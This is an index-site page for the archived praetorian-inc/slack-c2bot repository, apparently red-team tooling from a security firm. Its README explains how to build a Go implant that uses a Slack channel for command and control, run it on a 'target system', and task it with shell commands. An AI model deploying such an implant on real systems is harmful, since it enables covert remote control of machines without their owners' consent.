Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/praetorian-inc/slack-c2bot

Slack C2bot that executes commands and returns the output.
https://github.com/praetorian-inc/slack-c2bot

Last synced: 3 months ago
JSON representation

Slack C2bot that executes commands and returns the output.

Host: GitHub
URL: https://github.com/praetorian-inc/slack-c2bot
Owner: praetorian-inc
Archived: true
Created: 2019-04-18T19:02:52.000Z (over 5 years ago)
Default Branch: master
Last Pushed: 2023-03-13T01:11:53.000Z (over 1 year ago)
Last Synced: 2024-04-19T19:03:01.470Z (7 months ago)
Language: Go
Size: 7.81 KB
Stars: 45
Watchers: 8
Forks: 16
Open Issues: 2
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

awesome-hacking-lists - praetorian-inc/slack-c2bot - Slack C2bot that executes commands and returns the output. (Go)

README

# Slack C2bot

Slack C2bot that executes commands and returns the output.

Learn more by reading our full writeup:
[Using Slack as a Malicious C2 Vector: MITRE ATT&CK – Web Service (T1102)](https://p16.praetorian.com/blog/using-slack-as-c2-channel-mitre-attack-web-service-t1102)

## Setup

Install Golang and requirements:

```
sudo apt install golang-go
sudo apt install git
```

Install the Slack library:

```
go get "github.com/nlopes/slack"
```

## Usage

```
./build.sh [$CHANID] [$SLACKTOKEN]
```

The build script will generate a UUID for your bot.

If you dont already have a workspace you will need to [create one](https://slack.com/create).

Once you have a workspace, open a channel and note the channel id. This can be found by opening the channel in your browser. The uri is /messages/channelid/.

Save this as $CHANID.

Next, you will need to add a bot to your workspace. This can be done using the following steps:

- [Open https://api.slack.com/](https://api.slack.com/)
- Click Start building. Enter the name of the bot and the workspace.
- On the left menu listing, click: OAuth & Permissions
- Scroll down to Scopes. Add channels:history and chat:write:bot permissions.
- Click save.
- Scroll to the top of the page and click Install App to Workspace.
- Click authorize on the new popup.

Slack OAuth Token. This can be found by opening Your Apps -> Click the bot -> OAuth & Permissions.

Save this as $SLACKTOKEN.

Run the build script.

```
./build.sh $CHANID $SLACKTOKEN
```

Run the Slack c2 bot on the target system.

```
./output/lin_implant.bin
```

Open the Slack channel.

After the bot checks-in, you can task the bot to execute a command using the
following syntax:

```
[UUID] run whoami
```

The bot will post the output.